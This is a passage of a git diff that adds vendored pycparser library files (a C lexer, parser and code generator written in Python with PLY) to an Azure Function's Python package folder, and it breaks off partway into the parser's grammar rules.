self._generate_decl(n.type) + elif typ == c_ast.Typename: + return self._generate_type(n.type, emit_declname = emit_declname) + elif typ == c_ast.IdentifierType: + return ' '.join(n.names) + ' ' + elif typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl): + return self._generate_type(n.type, modifiers + [n], + emit_declname = emit_declname) + else: + return self.visit(n) + + def _parenthesize_if(self, n, condition): + """ Visits 'n' and returns its string representation, parenthesized + if the condition function applied to the node returns True. + """ + s = self._visit_expr(n) + if condition(n): + return '(' + s + ')' + else: + return s + + def _parenthesize_unless_simple(self, n): + """ Common use case for _parenthesize_if + """ + return self._parenthesize_if(n, lambda d: not self._is_simple_node(d)) + + def _is_simple_node(self, n): + """ Returns True for nodes that are "simple" - i.e. nodes that always + have higher precedence than operators. + """ + return isinstance(n, (c_ast.Constant, c_ast.ID, c_ast.ArrayRef, + c_ast.StructRef, c_ast.FuncCall)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_lexer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_lexer.py new file mode 100644 index 0000000..c33212f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_lexer.py @@ -0,0 +1,554 @@ +#------------------------------------------------------------------------------ +# pycparser: c_lexer.py +# +# CLexer class: lexer for the C language +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#------------------------------------------------------------------------------ +import re + +from .ply import lex +from .ply.lex import TOKEN + + +class CLexer(object): + """ A lexer for the C language. After building it, set the + input text with input(), and call token() to get new + tokens. + + The public attribute filename can be set to an initial + filename, but the lexer will update it upon #line + directives. + """ + def __init__(self, error_func, on_lbrace_func, on_rbrace_func, + type_lookup_func): + """ Create a new Lexer. + + error_func: + An error function. Will be called with an error + message, line and column as arguments, in case of + an error during lexing. + + on_lbrace_func, on_rbrace_func: + Called when an LBRACE or RBRACE is encountered + (likely to push/pop type_lookup_func's scope) + + type_lookup_func: + A type lookup function. Given a string, it must + return True IFF this string is a name of a type + that was defined with a typedef earlier. + """ + self.error_func = error_func + self.on_lbrace_func = on_lbrace_func + self.on_rbrace_func = on_rbrace_func + self.type_lookup_func = type_lookup_func + self.filename = '' + + # Keeps track of the last token returned from self.token() + self.last_token = None + + # Allow either "# line" or "# " to support GCC's + # cpp output + # + self.line_pattern = re.compile(r'([ \t]*line\W)|([ \t]*\d+)') + self.pragma_pattern = re.compile(r'[ \t]*pragma\W') + + def build(self, **kwargs): + """ Builds the lexer from the specification. Must be + called after the lexer object is created. + + This method exists separately, because the PLY + manual warns against calling lex.lex inside + __init__ + """ + self.lexer = lex.lex(object=self, **kwargs) + + def reset_lineno(self): + """ Resets the internal line number counter of the lexer. + """ + self.lexer.lineno = 1 + + def input(self, text): + self.lexer.input(text) + + def token(self): + self.last_token = self.lexer.token() + return self.last_token + + def find_tok_column(self, token): + """ Find the column of the token in its line. + """ + last_cr = self.lexer.lexdata.rfind('\n', 0, token.lexpos) + return token.lexpos - last_cr + + ######################-- PRIVATE --###################### + + ## + ## Internal auxiliary methods + ## + def _error(self, msg, token): + location = self._make_tok_location(token) + self.error_func(msg, location[0], location[1]) + self.lexer.skip(1) + + def _make_tok_location(self, token): + return (token.lineno, self.find_tok_column(token)) + + ## + ## Reserved keywords + ## + keywords = ( + 'AUTO', 'BREAK', 'CASE', 'CHAR', 'CONST', + 'CONTINUE', 'DEFAULT', 'DO', 'DOUBLE', 'ELSE', 'ENUM', 'EXTERN', + 'FLOAT', 'FOR', 'GOTO', 'IF', 'INLINE', 'INT', 'LONG', + 'REGISTER', 'OFFSETOF', + 'RESTRICT', 'RETURN', 'SHORT', 'SIGNED', 'SIZEOF', 'STATIC', 'STRUCT', + 'SWITCH', 'TYPEDEF', 'UNION', 'UNSIGNED', 'VOID', + 'VOLATILE', 'WHILE', '__INT128', + ) + + keywords_new = ( + '_BOOL', '_COMPLEX', + '_NORETURN', '_THREAD_LOCAL', '_STATIC_ASSERT', + '_ATOMIC', '_ALIGNOF', '_ALIGNAS', + ) + + keyword_map = {} + + for keyword in keywords: + keyword_map[keyword.lower()] = keyword + + for keyword in keywords_new: + keyword_map[keyword[:2].upper() + keyword[2:].lower()] = keyword + + ## + ## All the tokens recognized by the lexer + ## + tokens = keywords + keywords_new + ( + # Identifiers + 'ID', + + # Type identifiers (identifiers previously defined as + # types with typedef) + 'TYPEID', + + # constants + 'INT_CONST_DEC', 'INT_CONST_OCT', 'INT_CONST_HEX', 'INT_CONST_BIN', 'INT_CONST_CHAR', + 'FLOAT_CONST', 'HEX_FLOAT_CONST', + 'CHAR_CONST', + 'WCHAR_CONST', + 'U8CHAR_CONST', + 'U16CHAR_CONST', + 'U32CHAR_CONST', + + # String literals + 'STRING_LITERAL', + 'WSTRING_LITERAL', + 'U8STRING_LITERAL', + 'U16STRING_LITERAL', + 'U32STRING_LITERAL', + + # Operators + 'PLUS', 'MINUS', 'TIMES', 'DIVIDE', 'MOD', + 'OR', 'AND', 'NOT', 'XOR', 'LSHIFT', 'RSHIFT', + 'LOR', 'LAND', 'LNOT', + 'LT', 'LE', 'GT', 'GE', 'EQ', 'NE', + + # Assignment + 'EQUALS', 'TIMESEQUAL', 'DIVEQUAL', 'MODEQUAL', + 'PLUSEQUAL', 'MINUSEQUAL', + 'LSHIFTEQUAL','RSHIFTEQUAL', 'ANDEQUAL', 'XOREQUAL', + 'OREQUAL', + + # Increment/decrement + 'PLUSPLUS', 'MINUSMINUS', + + # Structure dereference (->) + 'ARROW', + + # Conditional operator (?) + 'CONDOP', + + # Delimiters + 'LPAREN', 'RPAREN', # ( ) + 'LBRACKET', 'RBRACKET', # [ ] + 'LBRACE', 'RBRACE', # { } + 'COMMA', 'PERIOD', # . , + 'SEMI', 'COLON', # ; : + + # Ellipsis (...) + 'ELLIPSIS', + + # pre-processor + 'PPHASH', # '#' + 'PPPRAGMA', # 'pragma' + 'PPPRAGMASTR', + ) + + ## + ## Regexes for use in tokens + ## + ## + + # valid C identifiers (K&R2: A.2.3), plus '$' (supported by some compilers) + identifier = r'[a-zA-Z_$][0-9a-zA-Z_$]*' + + hex_prefix = '0[xX]' + hex_digits = '[0-9a-fA-F]+' + bin_prefix = '0[bB]' + bin_digits = '[01]+' + + # integer constants (K&R2: A.2.5.1) + integer_suffix_opt = r'(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?' + decimal_constant = '(0'+integer_suffix_opt+')|([1-9][0-9]*'+integer_suffix_opt+')' + octal_constant = '0[0-7]*'+integer_suffix_opt + hex_constant = hex_prefix+hex_digits+integer_suffix_opt + bin_constant = bin_prefix+bin_digits+integer_suffix_opt + + bad_octal_constant = '0[0-7]*[89]' + + # character constants (K&R2: A.2.5.2) + # Note: a-zA-Z and '.-~^_!=&;,' are allowed as escape chars to support #line + # directives with Windows paths as filenames (..\..\dir\file) + # For the same reason, decimal_escape allows all digit sequences. We want to + # parse all correct code, even if it means to sometimes parse incorrect + # code. + # + # The original regexes were taken verbatim from the C syntax definition, + # and were later modified to avoid worst-case exponential running time. + # + # simple_escape = r"""([a-zA-Z._~!=&\^\-\\?'"])""" + # decimal_escape = r"""(\d+)""" + # hex_escape = r"""(x[0-9a-fA-F]+)""" + # bad_escape = r"""([\\][^a-zA-Z._~^!=&\^\-\\?'"x0-7])""" + # + # The following modifications were made to avoid the ambiguity that allowed backtracking: + # (https://github.com/eliben/pycparser/issues/61) + # + # - \x was removed from simple_escape, unless it was not followed by a hex digit, to avoid ambiguity with hex_escape. + # - hex_escape allows one or more hex characters, but requires that the next character(if any) is not hex + # - decimal_escape allows one or more decimal characters, but requires that the next character(if any) is not a decimal + # - bad_escape does not allow any decimals (8-9), to avoid conflicting with the permissive decimal_escape. + # + # Without this change, python's `re` module would recursively try parsing each ambiguous escape sequence in multiple ways. + # e.g. `\123` could be parsed as `\1`+`23`, `\12`+`3`, and `\123`. + + simple_escape = r"""([a-wyzA-Z._~!=&\^\-\\?'"]|x(?![0-9a-fA-F]))""" + decimal_escape = r"""(\d+)(?!\d)""" + hex_escape = r"""(x[0-9a-fA-F]+)(?![0-9a-fA-F])""" + bad_escape = r"""([\\][^a-zA-Z._~^!=&\^\-\\?'"x0-9])""" + + escape_sequence = r"""(\\("""+simple_escape+'|'+decimal_escape+'|'+hex_escape+'))' + + # This complicated regex with lookahead might be slow for strings, so because all of the valid escapes (including \x) allowed + # 0 or more non-escaped characters after the first character, simple_escape+decimal_escape+hex_escape got simplified to + + escape_sequence_start_in_string = r"""(\\[0-9a-zA-Z._~!=&\^\-\\?'"])""" + + cconst_char = r"""([^'\\\n]|"""+escape_sequence+')' + char_const = "'"+cconst_char+"'" + wchar_const = 'L'+char_const + u8char_const = 'u8'+char_const + u16char_const = 'u'+char_const + u32char_const = 'U'+char_const + multicharacter_constant = "'"+cconst_char+"{2,4}'" + unmatched_quote = "('"+cconst_char+"*\\n)|('"+cconst_char+"*$)" + bad_char_const = r"""('"""+cconst_char+"""[^'\n]+')|('')|('"""+bad_escape+r"""[^'\n]*')""" + + # string literals (K&R2: A.2.6) + string_char = r"""([^"\\\n]|"""+escape_sequence_start_in_string+')' + string_literal = '"'+string_char+'*"' + wstring_literal = 'L'+string_literal + u8string_literal = 'u8'+string_literal + u16string_literal = 'u'+string_literal + u32string_literal = 'U'+string_literal + bad_string_literal = '"'+string_char+'*'+bad_escape+string_char+'*"' + + # floating constants (K&R2: A.2.5.3) + exponent_part = r"""([eE][-+]?[0-9]+)""" + fractional_constant = r"""([0-9]*\.[0-9]+)|([0-9]+\.)""" + floating_constant = '(((('+fractional_constant+')'+exponent_part+'?)|([0-9]+'+exponent_part+'))[FfLl]?)' + binary_exponent_part = r'''([pP][+-]?[0-9]+)''' + hex_fractional_constant = '((('+hex_digits+r""")?\."""+hex_digits+')|('+hex_digits+r"""\.))""" + hex_floating_constant = '('+hex_prefix+'('+hex_digits+'|'+hex_fractional_constant+')'+binary_exponent_part+'[FfLl]?)' + + ## + ## Lexer states: used for preprocessor \n-terminated directives + ## + states = ( + # ppline: preprocessor line directives + # + ('ppline', 'exclusive'), + + # pppragma: pragma + # + ('pppragma', 'exclusive'), + ) + + def t_PPHASH(self, t): + r'[ \t]*\#' + if self.line_pattern.match(t.lexer.lexdata, pos=t.lexer.lexpos): + t.lexer.begin('ppline') + self.pp_line = self.pp_filename = None + elif self.pragma_pattern.match(t.lexer.lexdata, pos=t.lexer.lexpos): + t.lexer.begin('pppragma') + else: + t.type = 'PPHASH' + return t + + ## + ## Rules for the ppline state + ## + @TOKEN(string_literal) + def t_ppline_FILENAME(self, t): + if self.pp_line is None: + self._error('filename before line number in #line', t) + else: + self.pp_filename = t.value.lstrip('"').rstrip('"') + + @TOKEN(decimal_constant) + def t_ppline_LINE_NUMBER(self, t): + if self.pp_line is None: + self.pp_line = t.value + else: + # Ignore: GCC's cpp sometimes inserts a numeric flag + # after the file name + pass + + def t_ppline_NEWLINE(self, t): + r'\n' + if self.pp_line is None: + self._error('line number missing in #line', t) + else: + self.lexer.lineno = int(self.pp_line) + + if self.pp_filename is not None: + self.filename = self.pp_filename + + t.lexer.begin('INITIAL') + + def t_ppline_PPLINE(self, t): + r'line' + pass + + t_ppline_ignore = ' \t' + + def t_ppline_error(self, t): + self._error('invalid #line directive', t) + + ## + ## Rules for the pppragma state + ## + def t_pppragma_NEWLINE(self, t): + r'\n' + t.lexer.lineno += 1 + t.lexer.begin('INITIAL') + + def t_pppragma_PPPRAGMA(self, t): + r'pragma' + return t + + t_pppragma_ignore = ' \t' + + def t_pppragma_STR(self, t): + '.+' + t.type = 'PPPRAGMASTR' + return t + + def t_pppragma_error(self, t): + self._error('invalid #pragma directive', t) + + ## + ## Rules for the normal state + ## + t_ignore = ' \t' + + # Newlines + def t_NEWLINE(self, t): + r'\n+' + t.lexer.lineno += t.value.count("\n") + + # Operators + t_PLUS = r'\+' + t_MINUS = r'-' + t_TIMES = r'\*' + t_DIVIDE = r'/' + t_MOD = r'%' + t_OR = r'\|' + t_AND = r'&' + t_NOT = r'~' + t_XOR = r'\^' + t_LSHIFT = r'<<' + t_RSHIFT = r'>>' + t_LOR = r'\|\|' + t_LAND = r'&&' + t_LNOT = r'!' + t_LT = r'<' + t_GT = r'>' + t_LE = r'<=' + t_GE = r'>=' + t_EQ = r'==' + t_NE = r'!=' + + # Assignment operators + t_EQUALS = r'=' + t_TIMESEQUAL = r'\*=' + t_DIVEQUAL = r'/=' + t_MODEQUAL = r'%=' + t_PLUSEQUAL = r'\+=' + t_MINUSEQUAL = r'-=' + t_LSHIFTEQUAL = r'<<=' + t_RSHIFTEQUAL = r'>>=' + t_ANDEQUAL = r'&=' + t_OREQUAL = r'\|=' + t_XOREQUAL = r'\^=' + + # Increment/decrement + t_PLUSPLUS = r'\+\+' + t_MINUSMINUS = r'--' + + # -> + t_ARROW = r'->' + + # ? + t_CONDOP = r'\?' + + # Delimiters + t_LPAREN = r'\(' + t_RPAREN = r'\)' + t_LBRACKET = r'\[' + t_RBRACKET = r'\]' + t_COMMA = r',' + t_PERIOD = r'\.' + t_SEMI = r';' + t_COLON = r':' + t_ELLIPSIS = r'\.\.\.' + + # Scope delimiters + # To see why on_lbrace_func is needed, consider: + # typedef char TT; + # void foo(int TT) { TT = 10; } + # TT x = 5; + # Outside the function, TT is a typedef, but inside (starting and ending + # with the braces) it's a parameter. The trouble begins with yacc's + # lookahead token. If we open a new scope in brace_open, then TT has + # already been read and incorrectly interpreted as TYPEID. So, we need + # to open and close scopes from within the lexer. + # Similar for the TT immediately outside the end of the function. + # + @TOKEN(r'\{') + def t_LBRACE(self, t): + self.on_lbrace_func() + return t + @TOKEN(r'\}') + def t_RBRACE(self, t): + self.on_rbrace_func() + return t + + t_STRING_LITERAL = string_literal + + # The following floating and integer constants are defined as + # functions to impose a strict order (otherwise, decimal + # is placed before the others because its regex is longer, + # and this is bad) + # + @TOKEN(floating_constant) + def t_FLOAT_CONST(self, t): + return t + + @TOKEN(hex_floating_constant) + def t_HEX_FLOAT_CONST(self, t): + return t + + @TOKEN(hex_constant) + def t_INT_CONST_HEX(self, t): + return t + + @TOKEN(bin_constant) + def t_INT_CONST_BIN(self, t): + return t + + @TOKEN(bad_octal_constant) + def t_BAD_CONST_OCT(self, t): + msg = "Invalid octal constant" + self._error(msg, t) + + @TOKEN(octal_constant) + def t_INT_CONST_OCT(self, t): + return t + + @TOKEN(decimal_constant) + def t_INT_CONST_DEC(self, t): + return t + + # Must come before bad_char_const, to prevent it from + # catching valid char constants as invalid + # + @TOKEN(multicharacter_constant) + def t_INT_CONST_CHAR(self, t): + return t + + @TOKEN(char_const) + def t_CHAR_CONST(self, t): + return t + + @TOKEN(wchar_const) + def t_WCHAR_CONST(self, t): + return t + + @TOKEN(u8char_const) + def t_U8CHAR_CONST(self, t): + return t + + @TOKEN(u16char_const) + def t_U16CHAR_CONST(self, t): + return t + + @TOKEN(u32char_const) + def t_U32CHAR_CONST(self, t): + return t + + @TOKEN(unmatched_quote) + def t_UNMATCHED_QUOTE(self, t): + msg = "Unmatched '" + self._error(msg, t) + + @TOKEN(bad_char_const) + def t_BAD_CHAR_CONST(self, t): + msg = "Invalid char constant %s" % t.value + self._error(msg, t) + + @TOKEN(wstring_literal) + def t_WSTRING_LITERAL(self, t): + return t + + @TOKEN(u8string_literal) + def t_U8STRING_LITERAL(self, t): + return t + + @TOKEN(u16string_literal) + def t_U16STRING_LITERAL(self, t): + return t + + @TOKEN(u32string_literal) + def t_U32STRING_LITERAL(self, t): + return t + + # unmatched string literals are caught by the preprocessor + + @TOKEN(bad_string_literal) + def t_BAD_STRING_LITERAL(self, t): + msg = "String contains invalid escape code" + self._error(msg, t) + + @TOKEN(identifier) + def t_ID(self, t): + t.type = self.keyword_map.get(t.value, "ID") + if t.type == 'ID' and self.type_lookup_func(t.value): + t.type = "TYPEID" + return t + + def t_error(self, t): + msg = 'Illegal character %s' % repr(t.value[0]) + self._error(msg, t) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_parser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_parser.py new file mode 100644 index 0000000..6d7c65b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_parser.py @@ -0,0 +1,1936 @@ +#------------------------------------------------------------------------------ +# pycparser: c_parser.py +# +# CParser class: Parser and AST builder for the C language +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#------------------------------------------------------------------------------ +from .ply import yacc + +from . import c_ast +from .c_lexer import CLexer +from .plyparser import PLYParser, ParseError, parameterized, template +from .ast_transforms import fix_switch_cases, fix_atomic_specifiers + + +@template +class CParser(PLYParser): + def __init__( + self, + lex_optimize=True, + lexer=CLexer, + lextab='pycparser.lextab', + yacc_optimize=True, + yacctab='pycparser.yacctab', + yacc_debug=False, + taboutputdir=''): + """ Create a new CParser. + + Some arguments for controlling the debug/optimization + level of the parser are provided. The defaults are + tuned for release/performance mode. + The simple rules for using them are: + *) When tweaking CParser/CLexer, set these to False + *) When releasing a stable parser, set to True + + lex_optimize: + Set to False when you're modifying the lexer. + Otherwise, changes in the lexer won't be used, if + some lextab.py file exists. + When releasing with a stable lexer, set to True + to save the re-generation of the lexer table on + each run. + + lexer: + Set this parameter to define the lexer to use if + you're not using the default CLexer. + + lextab: + Points to the lex table that's used for optimized + mode. Only if you're modifying the lexer and want + some tests to avoid re-generating the table, make + this point to a local lex table file (that's been + earlier generated with lex_optimize=True) + + yacc_optimize: + Set to False when you're modifying the parser. + Otherwise, changes in the parser won't be used, if + some parsetab.py file exists. + When releasing with a stable parser, set to True + to save the re-generation of the parser table on + each run. + + yacctab: + Points to the yacc table that's used for optimized + mode. Only if you're modifying the parser, make + this point to a local yacc table file + + yacc_debug: + Generate a parser.out file that explains how yacc + built the parsing table from the grammar. + + taboutputdir: + Set this parameter to control the location of generated + lextab and yacctab files. + """ + self.clex = lexer( + error_func=self._lex_error_func, + on_lbrace_func=self._lex_on_lbrace_func, + on_rbrace_func=self._lex_on_rbrace_func, + type_lookup_func=self._lex_type_lookup_func) + + self.clex.build( + optimize=lex_optimize, + lextab=lextab, + outputdir=taboutputdir) + self.tokens = self.clex.tokens + + rules_with_opt = [ + 'abstract_declarator', + 'assignment_expression', + 'declaration_list', + 'declaration_specifiers_no_type', + 'designation', + 'expression', + 'identifier_list', + 'init_declarator_list', + 'id_init_declarator_list', + 'initializer_list', + 'parameter_type_list', + 'block_item_list', + 'type_qualifier_list', + 'struct_declarator_list' + ] + + for rule in rules_with_opt: + self._create_opt_rule(rule) + + self.cparser = yacc.yacc( + module=self, + start='translation_unit_or_empty', + debug=yacc_debug, + optimize=yacc_optimize, + tabmodule=yacctab, + outputdir=taboutputdir) + + # Stack of scopes for keeping track of symbols. _scope_stack[-1] is + # the current (topmost) scope. Each scope is a dictionary that + # specifies whether a name is a type. If _scope_stack[n][name] is + # True, 'name' is currently a type in the scope. If it's False, + # 'name' is used in the scope but not as a type (for instance, if we + # saw: int name; + # If 'name' is not a key in _scope_stack[n] then 'name' was not defined + # in this scope at all. + self._scope_stack = [dict()] + + # Keeps track of the last token given to yacc (the lookahead token) + self._last_yielded_token = None + + def parse(self, text, filename='', debug=False): + """ Parses C code and returns an AST. + + text: + A string containing the C source code + + filename: + Name of the file being parsed (for meaningful + error messages) + + debug: + Debug flag to YACC + """ + self.clex.filename = filename + self.clex.reset_lineno() + self._scope_stack = [dict()] + self._last_yielded_token = None + return self.cparser.parse( + input=text, + lexer=self.clex, + debug=debug) + + ######################-- PRIVATE --###################### + + def _push_scope(self): + self._scope_stack.append(dict()) + + def _pop_scope(self): + assert len(self._scope_stack) > 1 + self._scope_stack.pop() + + def _add_typedef_name(self, name, coord): + """ Add a new typedef name (ie a TYPEID) to the current scope + """ + if not self._scope_stack[-1].get(name, True): + self._parse_error( + "Typedef %r previously declared as non-typedef " + "in this scope" % name, coord) + self._scope_stack[-1][name] = True + + def _add_identifier(self, name, coord): + """ Add a new object, function, or enum member name (ie an ID) to the + current scope + """ + if self._scope_stack[-1].get(name, False): + self._parse_error( + "Non-typedef %r previously declared as typedef " + "in this scope" % name, coord) + self._scope_stack[-1][name] = False + + def _is_type_in_scope(self, name): + """ Is *name* a typedef-name in the current scope? + """ + for scope in reversed(self._scope_stack): + # If name is an identifier in this scope it shadows typedefs in + # higher scopes. + in_scope = scope.get(name) + if in_scope is not None: return in_scope + return False + + def _lex_error_func(self, msg, line, column): + self._parse_error(msg, self._coord(line, column)) + + def _lex_on_lbrace_func(self): + self._push_scope() + + def _lex_on_rbrace_func(self): + self._pop_scope() + + def _lex_type_lookup_func(self, name): + """ Looks up types that were previously defined with + typedef. + Passed to the lexer for recognizing identifiers that + are types. + """ + is_type = self._is_type_in_scope(name) + return is_type + + def _get_yacc_lookahead_token(self): + """ We need access to yacc's lookahead token in certain cases. + This is the last token yacc requested from the lexer, so we + ask the lexer. + """ + return self.clex.last_token + + # To understand what's going on here, read sections A.8.5 and + # A.8.6 of K&R2 very carefully. + # + # A C type consists of a basic type declaration, with a list + # of modifiers. For example: + # + # int *c[5]; + # + # The basic declaration here is 'int c', and the pointer and + # the array are the modifiers. + # + # Basic declarations are represented by TypeDecl (from module c_ast) and the + # modifiers are FuncDecl, PtrDecl and ArrayDecl. + # + # The standard states that whenever a new modifier is parsed, it should be + # added to the end of the list of modifiers. For example: + # + # K&R2 A.8.6.2: Array Declarators + # + # In a declaration T D where D has the form + # D1 [constant-expression-opt] + # and the type of the identifier in the declaration T D1 is + # "type-modifier T", the type of the + # identifier of D is "type-modifier array of T" + # + # This is what this method does. The declarator it receives + # can be a list of declarators ending with TypeDecl. It + # tacks the modifier to the end of this list, just before + # the TypeDecl. + # + # Additionally, the modifier may be a list itself. This is + # useful for pointers, that can come as a chain from the rule + # p_pointer. In this case, the whole modifier list is spliced + # into the new location. + def _type_modify_decl(self, decl, modifier): + """ Tacks a type modifier on a declarator, and returns + the modified declarator. + + Note: the declarator and modifier may be modified + """ + #~ print '****' + #~ decl.show(offset=3) + #~ modifier.show(offset=3) + #~ print '****' + + modifier_head = modifier + modifier_tail = modifier + + # The modifier may be a nested list. Reach its tail. + while modifier_tail.type: + modifier_tail = modifier_tail.type + + # If the decl is a basic type, just tack the modifier onto it. + if isinstance(decl, c_ast.TypeDecl): + modifier_tail.type = decl + return modifier + else: + # Otherwise, the decl is a list of modifiers. Reach + # its tail and splice the modifier onto the tail, + # pointing to the underlying basic type. + decl_tail = decl + + while not isinstance(decl_tail.type, c_ast.TypeDecl): + decl_tail = decl_tail.type + + modifier_tail.type = decl_tail.type + decl_tail.type = modifier_head + return decl + + # Due to the order in which declarators are constructed, + # they have to be fixed in order to look like a normal AST. + # + # When a declaration arrives from syntax construction, it has + # these problems: + # * The innermost TypeDecl has no type (because the basic + # type is only known at the uppermost declaration level) + # * The declaration has no variable name, since that is saved + # in the innermost TypeDecl + # * The typename of the declaration is a list of type + # specifiers, and not a node. Here, basic identifier types + # should be separated from more complex types like enums + # and structs. + # + # This method fixes these problems. + def _fix_decl_name_type(self, decl, typename): + """ Fixes a declaration. Modifies decl. + """ + # Reach the underlying basic type + # + type = decl + while not isinstance(type, c_ast.TypeDecl): + type = type.type + + decl.name = type.declname + type.quals = decl.quals[:] + + # The typename is a list of types. If any type in this + # list isn't an IdentifierType, it must be the only + # type in the list (it's illegal to declare "int enum ..") + # If all the types are basic, they're collected in the + # IdentifierType holder. + for tn in typename: + if not isinstance(tn, c_ast.IdentifierType): + if len(typename) > 1: + self._parse_error( + "Invalid multiple types specified", tn.coord) + else: + type.type = tn + return decl + + if not typename: + # Functions default to returning int + # + if not isinstance(decl.type, c_ast.FuncDecl): + self._parse_error( + "Missing type in declaration", decl.coord) + type.type = c_ast.IdentifierType( + ['int'], + coord=decl.coord) + else: + # At this point, we know that typename is a list of IdentifierType + # nodes. Concatenate all the names into a single list. + # + type.type = c_ast.IdentifierType( + [name for id in typename for name in id.names], + coord=typename[0].coord) + return decl + + def _add_declaration_specifier(self, declspec, newspec, kind, append=False): + """ Declaration specifiers are represented by a dictionary + with the entries: + * qual: a list of type qualifiers + * storage: a list of storage type qualifiers + * type: a list of type specifiers + * function: a list of function specifiers + * alignment: a list of alignment specifiers + + This method is given a declaration specifier, and a + new specifier of a given kind. + If `append` is True, the new specifier is added to the end of + the specifiers list, otherwise it's added at the beginning. + Returns the declaration specifier, with the new + specifier incorporated. + """ + spec = declspec or dict(qual=[], storage=[], type=[], function=[], alignment=[]) + + if append: + spec[kind].append(newspec) + else: + spec[kind].insert(0, newspec) + + return spec + + def _build_declarations(self, spec, decls, typedef_namespace=False): + """ Builds a list of declarations all sharing the given specifiers. + If typedef_namespace is true, each declared name is added + to the "typedef namespace", which also includes objects, + functions, and enum constants. + """ + is_typedef = 'typedef' in spec['storage'] + declarations = [] + + # Bit-fields are allowed to be unnamed. + if decls[0].get('bitsize') is not None: + pass + + # When redeclaring typedef names as identifiers in inner scopes, a + # problem can occur where the identifier gets grouped into + # spec['type'], leaving decl as None. This can only occur for the + # first declarator. + elif decls[0]['decl'] is None: + if len(spec['type']) < 2 or len(spec['type'][-1].names) != 1 or \ + not self._is_type_in_scope(spec['type'][-1].names[0]): + coord = '?' + for t in spec['type']: + if hasattr(t, 'coord'): + coord = t.coord + break + self._parse_error('Invalid declaration', coord) + + # Make this look as if it came from "direct_declarator:ID" + decls[0]['decl'] = c_ast.TypeDecl( + declname=spec['type'][-1].names[0], + type=None, + quals=None, + align=spec['alignment'], + coord=spec['type'][-1].coord) + # Remove the "new" type's name from the end of spec['type'] + del spec['type'][-1] + + # A similar problem can occur where the declaration ends up looking + # like an abstract declarator. Give it a name if this is the case. + elif not isinstance(decls[0]['decl'], ( + c_ast.Enum, c_ast.Struct, c_ast.Union, c_ast.IdentifierType)): + decls_0_tail = decls[0]['decl'] + while not isinstance(decls_0_tail, c_ast.TypeDecl): + decls_0_tail = decls_0_tail.type + if decls_0_tail.declname is None: + decls_0_tail.declname = spec['type'][-1].names[0] + del spec['type'][-1] + + for decl in decls: + assert decl['decl'] is not None + if is_typedef: + declaration = c_ast.Typedef( + name=None, + quals=spec['qual'], + storage=spec['storage'], + type=decl['decl'], + coord=decl['decl'].coord) + else: + declaration = c_ast.Decl( + name=None, + quals=spec['qual'], + align=spec['alignment'], + storage=spec['storage'], + funcspec=spec['function'], + type=decl['decl'], + init=decl.get('init'), + bitsize=decl.get('bitsize'), + coord=decl['decl'].coord) + + if isinstance(declaration.type, ( + c_ast.Enum, c_ast.Struct, c_ast.Union, + c_ast.IdentifierType)): + fixed_decl = declaration + else: + fixed_decl = self._fix_decl_name_type(declaration, spec['type']) + + # Add the type name defined by typedef to a + # symbol table (for usage in the lexer) + if typedef_namespace: + if is_typedef: + self._add_typedef_name(fixed_decl.name, fixed_decl.coord) + else: + self._add_identifier(fixed_decl.name, fixed_decl.coord) + + fixed_decl = fix_atomic_specifiers(fixed_decl) + declarations.append(fixed_decl) + + return declarations + + def _build_function_definition(self, spec, decl, param_decls, body): + """ Builds a function definition. + """ + if 'typedef' in spec['storage']: + self._parse_error("Invalid typedef", decl.coord) + + declaration = self._build_declarations( + spec=spec, + decls=[dict(decl=decl, init=None)], + typedef_namespace=True)[0] + + return c_ast.FuncDef( + decl=declaration, + param_decls=param_decls, + body=body, + coord=decl.coord) + + def _select_struct_union_class(self, token): + """ Given a token (either STRUCT or UNION), selects the + appropriate AST class. + """ + if token == 'struct': + return c_ast.Struct + else: + return c_ast.Union + + ## + ## Precedence and associativity of operators + ## + # If this changes, c_generator.CGenerator.precedence_map needs to change as + # well + precedence = ( + ('left', 'LOR'), + ('left', 'LAND'), + ('left', 'OR'), + ('left', 'XOR'), + ('left', 'AND'), + ('left', 'EQ', 'NE'), + ('left', 'GT', 'GE', 'LT', 'LE'), + ('left', 'RSHIFT', 'LSHIFT'), + ('left', 'PLUS', 'MINUS'), + ('left', 'TIMES', 'DIVIDE', 'MOD') + ) + + ## + ## Grammar productions + ## Implementation of the BNF defined in K&R2 A.13 + ## + + # Wrapper around a translation unit, to allow for empty input. + # Not strictly part of the C99 Grammar, but useful in practice. + def p_translation_unit_or_empty(self, p): + """ translation_unit_or_empty : translation_unit + | empty + """ + if p[1] is None: + p[0] = c_ast.FileAST([]) + else: + p[0] = c_ast.FileAST(p[1]) + + def p_translation_unit_1(self, p): + """ translation_unit : external_declaration + """ + # Note: external_declaration is already a list + p[0] = p[1] + + def p_translation_unit_2(self, p): + """ translation_unit : translation_unit external_declaration + """ + p[1].extend(p[2]) + p[0] = p[1] + + # Declarations always come as lists (because they can be + # several in one line), so we wrap the function definition + # into a list as well, to make the return value of + # external_declaration homogeneous. + def p_external_declaration_1(self, p): + """ external_declaration : function_definition + """ + p[0] = [p[1]] + + def p_external_declaration_2(self, p): + """ external_declaration : declaration + """ + p[0] = p[1] + + def p_external_declaration_3(self, p): + """ external_declaration : pp_directive + | pppragma_directive + """ + p[0] = [p[1]] + + def p_external_declaration_4(self, p): + """ external_declaration : SEMI + """ + p[0] = [] + + def p_external_declaration_5(self, p): + """ external_declaration : static_assert + """ + p[0] = p[1] + + def p_static_assert_declaration(self, p): + """ static_assert : _STATIC_ASSERT LPAREN constant_expression COMMA unified_string_literal RPAREN + | _STATIC_ASSERT LPAREN constant_expression RPAREN + """ + if len(p) == 5: + p[0] = [c_ast.StaticAssert(p[3], None, self._token_coord(p, 1))] + else: + p[0] = [c_ast.StaticAssert(p[3], p[5], self._token_coord(p, 1))] + + def p_pp_directive(self, p): + """ pp_directive : PPHASH + """ + 